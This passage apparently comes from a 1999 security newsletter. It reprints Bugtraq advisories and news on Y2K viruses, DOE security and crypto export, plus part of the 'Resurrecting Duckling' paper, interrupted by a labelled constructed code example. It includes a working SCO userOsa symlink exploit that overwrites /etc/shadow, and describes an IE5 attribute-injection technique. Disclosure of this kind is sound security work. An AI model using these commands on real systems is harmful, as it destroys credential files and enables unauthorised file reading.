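    print(smuggled_attributes(INJECTED_ID), escaped_attributes(INJECTED_ID))
```

The point a practitioner should take from it is that the same text is harmless or hostile depending only on whether it is escaped for the attribute context it lands in; the script that eventually runs is the IFRAME's, which is why the injected code ran in the file: security context.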
Georgi Guninski has created a demonstration, available at:

http://www.nat.bg/~joro/execcommand.html

The code is as follows:

Microsoft has released patches for IE 4.01 and IE5. The IE 4.01 patch is
included as part of the IE 4.01 Service Pack 2, available via:

http://www.microsoft.com/windows/ie/download/windows.htm

The IE5 patch is available as an individual fix from:

Intel:
ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/x86/q243638.exe
Alpha:
ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/Alpha/q243638.exe

The Microsoft Advisory MS 99-042 notes: "The IE5 patch also includes the
previously-released fix for the "Download Behavior" vulnerability, discussed
in http://www.microsoft.com/security/bulletins/ms99-040.asp."

credit
Posted to Bugtraq on October 11, 1999 by Georgi Guninski.

reference
advisory: MS99-042: Patch Available for "IFRAME ExecCommand" Vulnerability (MS)
http://www.securityfocus.com/templates/advisory.html?id=1788
message: IE 5.0 security vulnerability - reading local (and from any domain,
probably win (Georgi Guninski)
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38020E75.7966C579@nat.bg
web page: Microsoft Security Bulletin (MS99-042): Frequently Asked Questions (Microsoft)
http://www.microsoft.com/security/bulletins/MS99-042faq.asp
web page: Q243638: Update Available for "IFRAME ExecCommand" Vulnerability in
Internet Exp (Microsoft)
http://support.microsoft.com/support/kb/articles/q243/6/38.asp

To: BugTraq
Subject: IE 5.0 security vulnerability - reading local (and from any domain,
         probably window spoofing is possible) files using IFRAME and
         document.execCommand
Date: Mon Oct 11 1999 14:21:09
Author: Georgi Guninski
Message-ID: <38020E75.7966C579@nat.bg>

IE 5.0 security vulnerability - reading local (and from any domain, probably
window spoofing is possible) files using IFRAME and document.execCommand

Disclaimer:

The opinions expressed in this advisory and program are my own and not of any
company. The usual standard disclaimer applies, especially the fact that
Georgi Guninski is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this program. Georgi Guninski
bears NO responsibility for content or misuse of this program or any
derivatives thereof.

Description:

Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is
vulnerable) allows reading local files, text and HTML files from any domain
and probably window spoofing (have not tested window spoofing but believe it
is possible). It is also possible in some cases to read files behind a
firewall.

Details:

The problem is the combination of IFRAME and document.execCommand. Normally,
you cannot use execCommand on an IFRAME from another domain. But if you do:
"IFRAME.focus(); document.execCommand" then the command will be executed in
the IFRAME (some commands do not work in this way, but some do and that is
enough). So, we create an IFRAME with SRC="file://c:/test.txt" and inject
JavaScript code in it. When the JavaScript code is executed, it is executed in
the security context of the IFRAME - the "file:" protocol.

The injection is done using the "InsertParagraph" command (guess other
commands will do) which sets the ID of the paragraph. But if you place a " in
the ID, then a STYLE tag may be inserted also. The JavaScript code is injected
using the STYLE tag: STYLE="left:expression(eval(JSCode))"

This vulnerability may be exploited using an HTML email message or a newsgroup
posting.
The code is:
----------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------

Workaround: Disable Active Scripting

Demonstration is available at http://www.nat.bg/~joro/execcommand.html

Regards,
Georgi Guninski
http://www.nat.bg/~joro

@HWA

78.0 SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id      701
object          /etc/sysadm.d/bin/userOsa (exec)
class           Origin Validation Error
cve             GENERIC-MAP-NOMATCH
remote          No
local           Yes
published       October 11, 1999
updated         October 13, 1999
vulnerable      SCO Open Server 5.0.5
                SCO Open Server 5.0.4
                SCO Open Server 5.0.3
                SCO Open Server 5.0.2
                SCO Open Server 5.0.1
                SCO Open Server 5.0

Under certain versions of SCO OpenServer there exists a symlink vulnerability
which can be exploited to overwrite any file which is group writable by the
'auth' group. The problem in particular is in the /etc/sysadm.d/bin/userOsa
executable. When given garbage input the program will write out a debug log
(debug.log in the current directory). However, the program does not check
whether it is overwriting an existing file, nor whether that file is a
symlink. Therefore it is possible to overwrite, with debug data, any file which
is both owned by the 'auth' group and writable by that group. Both /etc/shadow
and /etc/passwd fall into this category. If such an attack were launched
against these files the system would be rendered unusable.

As per Brock Tellier's original posting to Bugtraq:

scohack:/tmp$ ln -s /etc/shadow.old debug.log
scohack:/tmp$ /etc/sysadm.d/bin/userOsa bah
connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}
Failed to listen to client
Failure in making connection to OSA.
scohack:/tmp$
-----
BEFORE EXPLOIT:
scohack:/# l /etc/shadow.old
-rw-rw----   1 root     auth          26 Oct 11 20:08 /etc/shadow.old

AFTER EXPLOIT (note the file size):
scohack:/# l /etc/shadow.old
-rw-rw----   1 root     auth         177 Oct 11 20:10 /etc/shadow.old
scohack:/# cat /etc/shadow.old
>>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by  <<<
SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}})
scohack:/#

credit
This vulnerability was posted to the Bugtraq mailing list by "Brock Tellier"
on Mon, 11 Oct 1999.

reference
message: SCO OpenServer 5.0.5 overwrite /etc/shadow (Brock Tellier)
http://www.securityfocus.com/templates/archive.pike?list=1&msg=02e601bf1426$b1043920$3177a8c0@webley
web page: Patches and Supplements from SCO (SCO)
http://www.sco.com/support/ftplists/index.html
web page: SCO Secure Technologies Group (SCO)
http://www.sco.com/security/

To: BugTraq
Subject: SCO OpenServer 5.0.5 overwrite /etc/shadow
Date: Mon Oct 11 1999 02:24:59
Author: Brock Tellier
Message-ID: <02e601bf1426$b1043920$3177a8c0@webley>

Greetings,

Any user may overwrite any file with group auth (i.e. /etc/shadow,
/etc/passwd) using /etc/sysadm.d/bin/userOsa. Note that this will not change
the permissions of the file or allow for the user to input a passwd entry
string into these files, it will simply clobber the contents of the file with
debug output.

When userOsa receives invalid input, it generates a log file called
"debug.log" in the PWD. This file is created with group auth permissions, does
not check for this file's existence, and will follow symlinks. Thus the
exploit is as follows:

scohack:/tmp$ ln -s /etc/shadow.old debug.log
scohack:/tmp$ /etc/sysadm.d/bin/userOsa bah
connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}
Failed to listen to client
Failure in making connection to OSA.
scohack:/tmp$
-----
BEFORE EXPLOIT:
scohack:/# l /etc/shadow.old
-rw-rw----   1 root     auth          26 Oct 11 20:08 /etc/shadow.old

AFTER EXPLOIT (note the file size):
scohack:/# l /etc/shadow.old
-rw-rw----   1 root     auth         177 Oct 11 20:10 /etc/shadow.old
scohack:/# cat /etc/shadow.old
>>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by  <<<
SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}})
scohack:/#

Brock Tellier
UNIX Systems Administrator

@HWA

79.0 ARE VIRUSES Y2K COMPLIANT?
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Thursday 21st October 1999 on 11:30 am CET

As if there isn't enough uncertainty about Y2K, computer virus experts advise
extra care to inoculate before the century turns, lest a virus take advantage
of Y2K chaos. Their concern? Not only viruses targeting Y2K, but also the new
year awakening dormant old viruses. A millennium virus may go unnoticed in the
Y2K confusion. A virus set to activate as the calendar rolls over might cause
damage that people will blame on Y2K, which would allow the virus to spread
more quickly, say some experts.

Are Viruses Y2K Compliant?
Be ready: Virus authors may target Y2K, or the new year may awaken dormant old
viruses.

by Charles Bermant, special to PC World
October 20, 1999, 6:30 p.m. PT

As if there isn't enough uncertainty about Y2K, computer virus experts advise
extra care to inoculate before the century turns, lest a virus take advantage
of Y2K chaos.

Their concern? A millennium virus may go unnoticed in the Y2K confusion. A
virus set to activate as the calendar rolls over might cause damage that
people will blame on Y2K, which would allow the virus to spread more quickly,
say some experts.

On the other hand, virus authors are an egotistical bunch who may not want to
share their 15 minutes of fame with another media event like the new
millennium.
Virus Opportunity

"We expect there will be some kind of virus attack," says Sal Viveros, Network
Associates group marketing manager for the Total Virus Defense Product, which
includes McAfee VirusScan. "When systems fail, administrators might not think
of a virus and head off on a wild goose chase in order to solve the problem."

Network Associates has already found six viruses keyed to Y2K, Viveros says.
He expects many more are set to deliver their payload either January 1 or on
January 3, when people return to work.

Antivirus vendor Panda Software sounded the alarm early. Its Web site warns
that many viruses rely on date stamps to operate, and it's uncertain how
they'll behave in 2000.

"Y2K has an unpredictable effect, and you can't just leave it to chance," says
Pedro Bustamante, executive director of Panda's U.S. office. "A lot of people
have outdated virus [protection] programs, and this gives them a false sense
of security."

Like the potential effect of Y2K on banking, power, and software, no one can
say for sure what viruses will do. Perhaps virus authors will take the
opportunity to create a monumental meanie.

"There might be a few new viruses written that the author hopes will not be
noticed in the general background noise of champagne corks popping," says Ross
M. Greenberg, an author of early antivirus products and former manager of
MSN's Computing Central's Safe Computing Forum. "But, generally, a virus author
wants their little creation to be noticed. There would be no delight in their
creation's damage not being credited to whatever name they hide behind if Y2K
took the credit for it."

Viveros disagrees, saying that Y2K is the ultimate challenge for a virus
author. "What better time to unleash a virus than when everyone is watching?"
Viveros asks.
@HWA

80.0 COMPUTER SECURITY AT CENTER OF DOE PROBLEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Thursday 21st October 1999 on 11:00 am CET

The former director of the Energy Department's Office of Safeguards and
Security today outlined for Congress years of cybersecurity problems at the
nation's nuclear weapons laboratories, claiming officials were aware of
ongoing espionage but failed to do anything about it. "A variety of computer
security tools and techniques, such as encryption devices, firewalls and
disconnect features, are required by policy; however, these policies were
frequently ignored." Federal Computer Week.

OCTOBER 20, 1999 . . . 18:06 EDT

Computer security at center of DOE problems, top officials say

BY DANIEL VERTON (dan_verton@fcw.com)

The former director of the Energy Department's Office of Safeguards and
Security today outlined for Congress years of cybersecurity problems at the
nation's nuclear weapons laboratories, claiming officials were aware of
ongoing espionage but failed to do anything about it.

Edward McCallum, the former chief of DOE security who is now detailed to the
Defense Department as the Pentagon's acting director of the Combating
Terrorism Technology Support Office, said DOE officials "knew our greatest
secrets were being stolen and . . . did nothing about it."

McCallum, who testified today before the House Armed Services Committee's
Military Procurement Subcommittee, said efforts by his office dating to 1995
to enhance DOE cybersecurity met with "significant laboratory resistance" and
ultimately failed.

"Several laboratories and their program assistant secretaries in Washington,
[D.C.], believed that protection, such as firewalls and passwords, was
unnecessarily expensive and a hindrance to science," McCallum said. "A variety
of computer security tools and techniques, such as encryption devices,
firewalls and disconnect features, are required by policy; however, these
policies were frequently ignored."

Retired Air Force Gen. Eugene Habiger, director of DOE's Office of Security
and Emergency Operations, told committee members that during his review of DOE
security measures, under way since he took the post in June, he discovered
that the department had lost its focus on security.

"By-products of this organizational dysfunction and lack of focus included . .
. a lack of attention to our cybersecurity practices in a world of increased
computer hacking and cyberterrorism," said Habiger.

McCallum identified the lack of protection afforded classified information
systems and the ease with which that information could be transferred to and
from classified systems as one of the DOE's primary security weaknesses.
"Something as simple as using different size floppy disks between classified
and unclassified systems was rejected as unnecessary," he said. "Indeed, I
believe we are sitting at the center of the worst spy scandal in our nation's
history."

Habiger also laid blame on Congress' failure to fund additional cybersecurity
initiatives requested by DOE in the department's fiscal 2000 budget proposal.
"We have valid requirements in the area of cybersecurity to buy hardware,
encryption equipment and to train our system administrators," Habiger said.
However, "simply stated, we have been given a mandate but not the additional
resources to accomplish that mandate."

@HWA

81.0 US REVISITS SOURCE CODE LIMITS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Wednesday 20th October 1999 on 11:50 pm CET

The Clinton administration is considering relaxing export limits on computer
source code for data scrambling programs, in a possible move acknowledging the
growing importance of Linux, a top export official said Tuesday.
Undersecretary of Commerce William Reinsch said the administration had
originally intended to maintain current export limits on source code, or
instructions written by a computer programmer that can be compiled into a
computer program. Following announcements by the White House on the relaxation
of pre-compiled crypto, the restrictions on source code are under review now
too. Wired.

US Revisits Source Code Limits

Reuters
3:00 a.m. 20.Oct.99.PDT

The Clinton administration is considering relaxing export limits on computer
source code for data scrambling programs, in a possible move acknowledging the
growing importance of Linux, a top export official said Tuesday.

Undersecretary of Commerce William Reinsch said the administration had
originally intended to maintain current export limits on source code, or
instructions written by a computer programmer that can be compiled into a
computer program.

But after the administration announced it would significantly relax many of
its limits on already compiled computer encryption programs, high-tech
companies complained that retaining the source code limit was unworkable,
Reinsch said in a telephone interview.

"We are now reviewing that," Reinsch said. "It's on the table as [an] area
where we might make a revision."

Revised encryption export rules will be released by 15 December, he said, with
any possible changes for source code export likely included at that time.

Encryption, which uses mathematical formulas to scramble information and
protect it from prying eyes, is now included in everything from Web browsers
and email programs to cable television set-top boxes and handheld computers.

Traditionally, software companies sold finished programs but kept the source
code underlying their programs a tightly guarded secret. Microsoft, for
example, has never published the source code underlying its Windows operating
system.
More recently, a movement of "open source" software has gained momentum,
including a version of the Unix operating system developed by Linus Torvalds
and known as Linux. Source code of such programs is made freely available to
anyone, usually over the Internet.

But the export rules consider posting source code on the Internet, where
people in other countries can download it, a form of export. That creates
problems for US programmers who want to include encryption features for Linux
or other "open source" programs.

A three-judge panel of the Ninth US Court of Appeals ruled in May that the
source code export limits were a violation of the First Amendment's free
speech guarantee, but the decision is being reviewed by the full appeals
court. Computer science professor Daniel Bernstein filed the lawsuit so he
could post an encryption program he had written on the Internet. A change in
the export rules could render the case moot.

Copyright 1999 Reuters Limited.

@HWA

82.0 SECURITY FOR AD-HOC WIRELESS NETWORKS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Wednesday 20th October 1999 on 11:30 pm CET

The Resurrecting Duckling is a security policy model which describes secure
transient association of a device with multiple serialised owners. Basically
a nice description of some of the security issues in wireless networks and
ways to battle those. Cambridge paper.

The Resurrecting Duckling: Security Issues for Ad-hoc Wireless Networks

Frank Stajano and Ross Anderson

In the near future, many personal electronic devices will be able to
communicate with each other over a short range wireless channel. We
investigate the principal security issues for such an environment. Our
discussion is based on the concrete example of a thermometer that makes its
readings available to other nodes over the air.
Some lessons learned from this example appear to be quite general to ad-hoc
networks, and rather different from what we have come to expect in more
conventional systems: denial of service, the goals of authentication, and the
problems of naming all need re-examination. We present the resurrecting
duckling security policy model, which describes secure transient association
of a device with multiple serialised owners.

This research was first presented at the 7th International Workshop on
Security Protocols, held in Cambridge, UK, from 1999-04-19 to 1999-04-21. The
proceedings will be published by Springer-Verlag in the Lecture Notes in
Computer Science series. The full text of the paper is available as PDF
(114 KB), gzipped PostScript (127 KB) or HTML (35 KB).

A few months later, an abridged and updated version was presented at the 3rd
AT&T Software Symposium, held in Middletown, NJ, USA, on 1999-10-20. The text
of this version is available as PDF (70 KB) or gzipped PostScript (104 KB).

http://www.cl.cam.ac.uk/~fms27/papers/duckling.pdf
http://www.cl.cam.ac.uk/~fms27/papers/duckling.ps.gz
http://www.cl.cam.ac.uk/~fms27/duckling/duckling.html
http://www.cl.cam.ac.uk/~fms27/papers/duckling-attss99.pdf
http://www.cl.cam.ac.uk/~fms27/papers/duckling-attss99.ps.gz

The Resurrecting Duckling: Security Issues for Ad-hoc Wireless Networks

Frank Stajano (1,2) and Ross Anderson (1)

(1) University of Cambridge Computer Laboratory, New Museums Site, Pembroke
    Street, Cambridge CB2 3QG, UK
    name.surname@cl.cam.ac.uk
(2) AT&T Laboratories Cambridge, 24a Trumpington Street, Cambridge CB2 1QA, UK
    fstajano@uk.research.att.com

Abstract

In the near future, many personal electronic devices will be able to
communicate with each other over a short range wireless channel. We
investigate the principal security issues for such an environment. Our
discussion is based on the concrete example of a thermometer that makes its
readings available to other nodes over the air.
Some lessons learned from this example appear to be quite general to ad-hoc
networks, and rather different from what we have come to expect in more
conventional systems: denial of service, the goals of authentication, and the
problems of naming all need re-examination. We present the resurrecting
duckling security policy model, which describes secure transient association
of a device with multiple serialised owners.

Introduction

The established trend in consumer electronics is to embed a microprocessor in
everything (cellphones, car stereos, televisions, VCRs, watches, GPS (Global
Positioning System) receivers, digital cameras), to the point that most users
have already lost track of the number of items they own that contain one. In
some specific environments such as avionics, electronic devices are already
becoming networked; in others, work is underway. Medical device manufacturers
want instruments such as thermometers, heart monitors and blood oxygen meters
to report to a nursing station; consumer electronics makers are promoting the
Firewire standard [firewire] for PCs, stereos, TVs and DVD players to talk to
each other; and kitchen appliance vendors envisage a future in which the oven
will talk to the fridge, which will reorder food over the net.

We envisage that, in the near future, this networking will become much more
general. The next step is to embed a short range wireless transceiver into
everything; then many gadgets can become more useful and effective by
communicating and cooperating with each other. A camera, for example, might
obtain the geographical position and exact time from a nearby GPS unit every
time a picture is taken, and record that information with the image. At
present, if the photographer wants to record a voice note with the picture,
the camera must incorporate digital audio hardware; in the future, the camera
might let him speak into his digital audio recorder or cellphone.
Each device, by becoming a network node, may take advantage of the services
offered by other nearby devices instead of having to duplicate their
functionality.

Ad-hoc Wireless Networks

This vision of embeddable wireless connectivity has been in development for
several years at AT&T Laboratories Cambridge in the context of the Piconet
[piconet97] project and is also being pursued, although with emphasis on
different aspects, by several other groups including HomeRF
[homerf-www,homerf98], IrDA [irda-www] (which uses infrared instead of radio)
and Bluetooth [bluetooth-www,bluetooth98].

Everyone, including potential users, knows that wireless networking is more
prone to passive eavesdropping attacks. But it would be highly misleading to
take this as the only, or even the main, security concern. In this paper we
investigate the security issues of an environment characterised by the
presence of many principals acting as network peers in intermittent contact
with each other.

To base the discussion on a concrete example we shall consider a wireless
temperature sensor. Nearby nodes may be authorised to request the current
temperature, or to register a "watch" that will cause the thermometer to send
out a reading when the temperature enters a specific range. We wish to make
our thermometer useful in the widest range of environments including
environmental monitoring, industrial process control and medicine. We will
therefore consider how we can enable our thermometer to support all the
security properties that might be required, including confidentiality,
integrity (and its close relative authenticity) and availability. Contrary to
academic tradition, however, we shall examine them in the opposite order, as
this often (and certainly in our case) reflects their actual importance.
First, however, we have to mention some of the resource constraints under
which such networks operate.
System constraints

The three main constraints on Piconet, and on similar systems which support
ad-hoc networks of battery operated personal devices, are as follows:

  Peanut CPU: the computing power of the processor in the node is typically
  small, so large computations are slow.

  Battery power: the total energy available to the node is a scarce resource.
  The node likes to go to sleep whenever possible. It is not desirable to use
  idle time to perform large computations in the background.

  High latency: to conserve power, nodes are off most of the time and only
  turn on their receiver periodically. Communicating with such nodes involves
  waiting until they next wake up.

The consequence of those constraints is that, while strong symmetric
cryptography is feasible, modular arithmetic is difficult and so is strong
asymmetric cryptography. Where a peanut node (e.g. the one embedded in a
camera) interacts with a more powerful one (e.g. the one embedded in a mobile
phone or laptop), one may use techniques such as low exponent RSA, with the
protocols designed so that the peanut node sticks to the cheap operations of
encryption and verification while avoiding the expensive ones of decryption
and signature.

More generally, where there is a trade-off between security and (say) battery
life, we may want to let the user control this. For example, if our
thermometer is used to drive a wall display in someone's living room that
shows the outside temperature, then the owner is unlikely to opt for validated
and encrypted communication if this means that he must change the battery
every month instead of once a year. One challenge is to integrate this
flexibility in the system without introducing major architectural holes of the
sort that would allow the attacker, too, to turn off security at will.

Availability

Availability means ensuring that the service offered by the node will be
available to its users when expected.
In most non-military scenarios, this is the security property of greatest
relevance for the user. All else counts little if the device cannot do what it
should.

Radio jamming

In the traditional threat model, derived from the military, an attacker can
deny service to the nodes in a given area by jamming the radio frequencies
they use. Traditional defences include spread spectrum and frequency hopping,
both of which force the attacker to jam a wider frequency band and thus use
more power. We will revisit them briefly in a later section. However such
concerns are of less relevance to the commercial world, where such attacks are
dealt with by complaining to the authorities and having the operator of the
jamming station arrested. The novel and interesting service denial threat is
different, and concerns battery exhaustion.

Battery exhaustion

A malicious user may interact with a node in an otherwise legitimate way, but
for no other purpose than to consume its battery energy. Battery life is the
critical parameter for many portable devices, and many techniques are used to
maximise it; in Piconet, for example, nodes try to spend most of the time in a
sleep mode in which they only listen for radio signals once in a while (the
period can be set from a few seconds to several minutes). In this environment,
power exhaustion attacks are a real threat, and are much more powerful than
better known denial of service threats such as CPU exhaustion; once the
battery runs out the attacker can stop and walk away, leaving the victim
disabled. We call this technique the sleep deprivation torture attack.

For any public access server, there is necessarily a tension between the
contrasting goals of being useful to unknown users and not succumbing to
vandals. Whereas some applications can restrict access to known principals, in
others (such as web servers and name servers) this is infeasible since the
very usefulness of the service comes from its being universally available.
If a server has a primary function (such as sending the outside temperature to
the meteorological office every hour) and a distinct auxiliary function (such
as sending the current temperature to anyone who requests it) then these
functions can be prioritised; a reservation mechanism can ensure that the
higher priority use receives a guaranteed share of the resource regardless of
the number of requests generated by the lower priority uses. (The highest
priority use of all may be battery management: if one can estimate fairly
accurately the amount of usable energy remaining, then the service can be
monitored and managed provided that the process does not itself consume too
much of the resource it is intended to conserve.)

Authenticity

To whom can a principal talk? In some applications our thermometer will
broadcast its temperature readings, but in general it will only send them to
recipients who have been authorised in some way. For example, in a hospital,
it might be authorised to send temperature readings to any doctor's palmtop
computer or any nursing station. But it might also be required to restrict
transmission (e.g. of the temperature of a celebrity) to a particular station
or device.

The usual authorisation mechanisms (which turn out to be the least interesting
in this case) involve a centralised system administrator. This may be
implemented as access control lists (the administrator tells the thermometer
who is authorised) or capabilities (the administrator gives some principals a
signed certificate which they present to the thermometer when they want a
reading). However, the ad-hoc network environment poses a fundamental new
problem: the absence of an online server.
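The reservation mechanism sketched under Availability above, as an added example that is not part of Stajano and Anderson's paper: a thermometer node whose hourly report to the meteorological office is the primary duty and whose answers to ad-hoc queries are the auxiliary one. The node refuses auxiliary requests as soon as serving one would eat into a reserved share of the battery, so a sleep deprivation attack can at worst exhaust the unreserved part. The energy figures, the 50% reserve and the class and function names are constructed for the illustration.

```python
# Added example, not from Stajano and Anderson's paper: a battery-powered
# server that reserves a share of its energy for its primary duty, so a flood
# of auxiliary requests (the paper's "sleep deprivation torture") cannot
# drain it completely. All energy figures (millijoules) are constructed.


class PowerManagedServer:
    """Node with a primary duty (hourly report) and an auxiliary one (ad-hoc queries)."""

    def __init__(self, battery_mj, reserve_fraction, primary_cost_mj, aux_cost_mj):
        self.remaining_mj = battery_mj
        # Energy below this line is kept for the primary duty only.
        self.reserve_mj = battery_mj * reserve_fraction
        self.primary_cost_mj = primary_cost_mj
        self.aux_cost_mj = aux_cost_mj
        self.aux_served = 0
        self.aux_refused = 0

    def report_to_met_office(self):
        """Primary duty: may dip into the reserve; fails only when the battery is flat."""
        if self.remaining_mj < self.primary_cost_mj:
            return False
        self.remaining_mj -= self.primary_cost_mj
        return True

    def answer_temperature_query(self):
        """Auxiliary duty: refused as soon as it would touch the reserve."""
        if self.remaining_mj - self.aux_cost_mj < self.reserve_mj:
            self.aux_refused += 1
            return False
        self.remaining_mj -= self.aux_cost_mj
        self.aux_served += 1
        return True

    def primary_reports_affordable(self):
        """How many primary reports the remaining energy still pays for."""
        return int(self.remaining_mj // self.primary_cost_mj)


def sleep_deprivation_attack(server, requests):
    """Attacker issues `requests` auxiliary queries; returns (served, refused, reports left)."""
    for _ in range(requests):
        server.answer_temperature_query()
    return server.aux_served, server.aux_refused, server.primary_reports_affordable()


def compare_policies(battery_mj=1000, primary_cost_mj=10, aux_cost_mj=1, requests=10_000):
    """Same attack against an unmanaged node (no reserve) and a managed one (50% reserve)."""
    unmanaged = PowerManagedServer(battery_mj, 0.0, primary_cost_mj, aux_cost_mj)
    managed = PowerManagedServer(battery_mj, 0.5, primary_cost_mj, aux_cost_mj)
    return {
        "unmanaged": sleep_deprivation_attack(unmanaged, requests),
        "managed": sleep_deprivation_attack(managed, requests),
    }


if __name__ == "__main__":
    for policy, (served, refused, reports) in compare_policies().items():
        print(f"{policy}: served {served} queries, refused {refused}, "
              f"{reports} primary reports still affordable")
```

With these constructed figures the unmanaged node answers 1000 queries and is then dead for its real job, while the managed node answers 500, refuses the rest, and can still file 50 hourly reports. The check itself costs something too, which is the paper's caveat: the energy estimate has to be cheap relative to what it protects.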
Interactions with the administrator after the thermometer has been
manufactured (or personalised by the institution that owns it) may be
expensive or time-consuming, as they may entail establishing a network
connection to a central server (perhaps using gossiping via intermediate
nodes), or bringing a management device physically close to each affected
node. In the particular case of a thermometer, the device might be calibrated
every six months, at which time new security state can be loaded; however,
rapid changes may be too expensive for a central administrator to make
regularly. It follows that the length of any validity period (whether for
certificates or access control lists) will be a trade-off between timeliness
and convenience. But relying on expiration dates imposes on the nodes the
extra cost of running a secure clock; otherwise the holder of an expired
certificate might reset a node's clock to a time within the validity period.
As many Piconet nodes would not normally have an onboard clock, the classical
approach to authentication is suspect. Thankfully, there is a better way.

Secure transient association

The novel and interesting authentication problem in ad-hoc networks of
wireless devices is that of secure transient association. If a householder
owns a device, say a universal remote control, that lets her control various
other devices in her home (such as hi-fi and television components, the
heating system, lights, curtains and even the locks and burglar alarm) then
she will need to ensure that a new device she buys from the shop will obey her
commands, and not her neighbour's. She will want to be assured that a burglar
cannot take over the heat sensing floodlight in the garden, or unlock the back
door, just by sending it a command from a remote control bought in the same
shop. As well as being secure (whatever that means), the association between
the controller and the peripheral must also be transient.
When a householder resells or gives away her television set or hi-fi or fridge, it will have to obey another controller; when her controller breaks down (or she decides to replace it or upgrade its operating system), she must be able to regain control of all the gadgets she already owns. A central authentication service is possible for expensive consumer durables; most governments run such services for houses and cars. But there is no prospect that this will be extended to all durable consumer goods; the UK government abandoned dog licensing some years ago as uneconomic. In any case, there would be very grave civil liberties objections to the government maintaining lists of all PCs, hi-fis and DVD players in the country; the outcry over the Pentium III processor ID indicates the likely level of political resistance. Even the existing central services stop short of managing keys; the replacement of car keys is left to the motor trade, while house locks are completely uncontrolled. So it is desirable that key management be performed locally: the last thing we want is to impose an expensive and unpopular central solution. Yet it would be nice if we could still provide some means of making a stolen DVD player harder to resell. Another insight comes from scenarios where we have a pool of identical devices, such as a bowl of disinfectant containing ten thermometers. The doctor does not really care which thermometer she gets when she picks one up, but she does care that the one her palmtop talks to is the same one she is holding and not any other one in the bowl or nearby in the ward. Many more potential applications of wireless devices require establishing a secure transient association between two principals (typically, but not necessarily, a user and a peripheral). 
For example, there has been significant interest in the possibility of a police pistol that can only fire when held by the officer to whom it was issued, who for this purpose might be wearing a very short range radio ring: at present, in the USA, a large number of the firearm injuries sustained by policemen come from stolen police guns. Similar considerations might apply to more substantial weapon systems, such as artillery, that might fall into enemy hands.

The "resurrecting duckling" security policy

A metaphor inspired by biology will help us describe the behaviour of a device that properly implements secure transient association. As Konrad Lorenz beautifully narrates [Lorenz], a duckling emerging from its egg will recognise as its mother the first moving object it sees that makes a sound, regardless of what it looks like: this phenomenon is called imprinting. Similarly, our device (whose egg is the shrink-wrapped box that encloses it as it comes out of the factory) will recognise as its owner the first entity that sends it a secret key. As soon as this `ignition key' is received, the device is no longer a newborn and will stay faithful to its owner for the rest of its life. If several entities are present at the device's birth, then the first one that sends it a key becomes the owner: to use another biological metaphor, only the first sperm gets to fertilise the egg. We can view the hardware of the device as the body, and the software (particularly the state) as the soul. As long as the soul stays in the body, the duckling remains alive and bound to the same mother to which it was imprinted. But this bond is broken by death: thereupon, the soul dissolves and the body returns to its pre-birth state, with the resurrecting duckling ready for another imprinting that will start a new life with another soul. Death is the only event that returns a live device to the pre-birth state in which it will accept an imprinting. We call this process reverse metempsychosis.
Metempsychosis refers to the transmigration of souls as proposed in a number of religions; our policy is the reverse of this as, rather than a single soul inhabiting a succession of bodies, we have a single body inhabited by a succession of souls [Note: Prior art on this technique includes Larry Niven's science fiction novel A World Out of Time (1977) in which convicted criminals have their personalities "wiped" and their bodies recycled.]. With some devices, death can be designed to follow an identifiable transaction: our medical thermometer can be designed to die (and lose its memory of the previous key and patient) when returned to the bowl of disinfectant. With others, we can arrange a simple timeout, so that the duckling dies of old age. With other devices (and particularly those liable to be stolen) we will arrange that the duckling will only die when so instructed by its mother: thus only the currently authorised user may transfer control of the device. In order to enforce this, some level of tamper resistance will be required: assassinating the duckling without damaging its body should be made suitably difficult and expensive. In some applications we may need to be able to recover from circumstances in which the legitimate user loses the shared secret (e.g. the password is forgotten or the remote control is broken beyond repair). To be able to regain control of the duckling, one should allow for escrowed seppuku: someone other than the mother, such as the manufacturer, holds the role of Shogun with a master password that can command the device to commit suicide. In other applications, only part of the duckling's soul should perish. In fact, our thermometer will typically be calibrated every six months by the hospital's (or manufacturer's) technician, and the calibration information must not be erased along with the patient data and user key when the device is disinfected, but only when it is plugged into a calibration station.
So we may consider the device to be endowed with two souls, the calibration state and the user state, and a rule that the latter may not influence the former. So our resurrecting duckling security policy may be combined with multilevel security concepts (in fact, "multilevel secure souls" are a neat application of the Biba integrity policy model [Biba1975]).

Imprinting

During the imprinting phase, as we said, a shared secret is established between the duckling and the mother. Again, we might think that this is easy to do. If at least one of the two principals involved can perform the expensive public key operations (decrypt and sign), the other device then simply generates a random secret and encrypts it under the public key of the powerful device from which it gets back a signed confirmation. But many of our nodes lack the ability to do public key, and even if they did it would still not help much. Suppose that a doctor picks up a thermometer and tries to get his palmtop to do a Diffie-Hellman key exchange with it over the air. How can he be sure that the key has been established with the right thermometer? If both devices have screens, then a hash of the key might be displayed and verified manually; but this is bad engineering as it is both tedious and error-prone, and in an environment where we want neither. We are not likely to want to give a screen to every device; after all, sharing peripherals is one of the goals of ad-hoc networking. In many applications, there will only be one satisfactory solution, and we advocate its use generally as it is effective, cheap and simple: physical contact. When the device is in the pre-birth state, simply touching it with an electrical contact that transfers the bits of a shared secret constitutes the 